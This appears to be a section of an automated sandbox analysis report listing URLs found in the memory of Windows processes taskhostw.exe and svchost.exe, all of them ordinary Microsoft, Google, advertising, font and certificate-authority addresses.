    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
    Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0E
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
    Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
    Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0M
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
    Source: taskhostw.exe, 0000001E.00000002.501238733.00000255FA2F0000.00000008.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
    Source: taskhostw.exe, 0000001E.00000000.273188144.00000255FA370000.00000008.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
    Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
    Source: taskhostw.exe, 0000001E.00000002.500148816.00000255F9E18000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
    Source: taskhostw.exe, 0000001E.00000002.500148816.00000255F9E18000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=75&w=100&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.c
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://www.msn.com
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
    Source: taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpU
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500649576.00000255F9F41000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp, svchost.exe, 00000004.00000000.235445986.0000024844045000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
    Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
    Source: taskhostw.exe, 0000001E.00000000.271595564.00000255F9DF8000.00000002.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.250058237.00000255F5875000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
    Source: taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1:
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
    Source: taskhostw.exe, 0000001E.00000002.501026757.00000255FA0C0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1?
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBEB4CB72
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Google
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7064439419818173&output=html&h=250&twa=
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/adview?ai=C4ZZc-r8UXcilEM6E-gaA-YLQCODD_YZVtLCoh4gJ8ui0tf
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
